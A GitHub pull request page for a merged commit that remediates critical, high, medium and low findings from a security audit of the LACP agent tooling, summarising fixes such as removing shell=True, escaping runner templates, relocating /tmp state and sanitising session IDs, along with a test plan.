Skip to content

fix(security): remediate 2C/5M/6L findings from security audit#22

Merged
0xNyk merged 1 commit into
mainfrom
fix/security-audit-remediation
Mar 21, 2026
Merged

fix(security): remediate 2C/5M/6L findings from security audit#22
0xNyk merged 1 commit into
mainfrom
fix/security-audit-remediation

Conversation

@0xNyk

@0xNyk 0xNyk commented Mar 21, 2026

Copy link
Copy Markdown
Owner

Summary

Full security audit remediation covering 2 critical, 5 high/medium, and 6 low severity findings across hooks, runners, configs, and CLI tools.

Critical Fixes

  • C1: Command injection via shell=True in stop quality gate — replaced with shlex.split() + shell=False, added test runner allowlist, removed /tmp command cache
  • C2: Shell injection in runner scripts — escaped all template substitutions with printf %q

High Fixes

  • H1: Predictable /tmp file paths — moved all hook state to ~/.lacp/hooks/state/ with 0700 dirs
  • H2: Unsafe .env sourcing — replaced source .env with strict KEY=VALUE parser (safe $HOME/~ expansion only)

Medium Fixes

  • M2: mcp-heavy profile now keeps server allowlist requirement enabled
  • M3: Enterprise policy pack now requires session fingerprint
  • M4: Install script hardcodes REPO_SLUG, adds optional SHA-256 checksum verification
  • M5: trusted-local-dev credential profile rejected when LACP_ALLOW_EXTERNAL_REMOTE=true

Low Fixes

  • L1: Session ID path traversal prevention via sanitization regex
  • L2: Debug log moved from world-readable /tmp to ~/.lacp/ with 0600 perms
  • L3: Provenance chain uses full SHA-256 (backward-compatible verify)
  • L4: Agent ID entropy increased from 32-bit to 128-bit
  • L5: Exfiltration check documented as defense-in-depth
  • L6: Personal vault path replaced with placeholder

Test plan

  • bin/lacp-test --quick passes
  • scripts/ci/test-hook-contracts.sh passes
  • All modified shell scripts pass bash -n syntax check
  • All modified JSON configs pass python3 -m json.tool validation
  • Session ID sanitization verified against path traversal payloads
  • Test runner allowlist verified against injection attempts
  • .env parser verified: expands $HOME/~, blocks $(...) injection
  • Existing provenance chain verifies intact with backward-compatible hash comparison
  • All Python hook modules import cleanly

🤖 Generated with Claude Code

@0xNyk
fix(security): remediate 2 critical, 5 high/medium, 6 low findings fr…
8db04e4 
…om audit

Critical:
- C1: Replace shell=True with shlex.split()+shell=False in stop quality gate,
  add test runner allowlist, remove /tmp command cache fallback
- C2: Escape shell metacharacters with printf %q in tmux/dmux/worktree runners

High:
- H1: Move all /tmp/lacp-* state to ~/.lacp/hooks/state/ with 0700 perms
- H2: Replace source .env with strict KEY=VALUE parser (safe $HOME expansion)

Medium:
- M2: Keep LACP_MCP_REQUIRE_SERVER_ALLOWLIST=true in mcp-heavy profile
- M3: Enable LACP_REQUIRE_SESSION_FINGERPRINT in enterprise policy pack
- M4: Hardcode REPO_SLUG in install.sh, add optional SHA-256 verification
- M5: Add constraints.reject_when_env guard to trusted-local-dev profile

Low:
- L1: Sanitize session IDs in file paths (hook_contracts.py, stop_quality_gate.py)
- L2: Move debug log to ~/.lacp/hooks/state/ with 0600 perms
- L3: Use full SHA-256 digest in provenance chain (backward-compatible verify)
- L4: Increase agent ID entropy from 32-bit to 128-bit
- L5: Document exfiltration check as defense-in-depth
- L6: Replace personal vault path with placeholder in obsidian manifest
@0xNyk 0xNyk merged commit 40f38d6 into main Mar 21, 2026
@0xNyk 0xNyk deleted the fix/security-audit-remediation branch March 21, 2026 16:12
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@0xNyk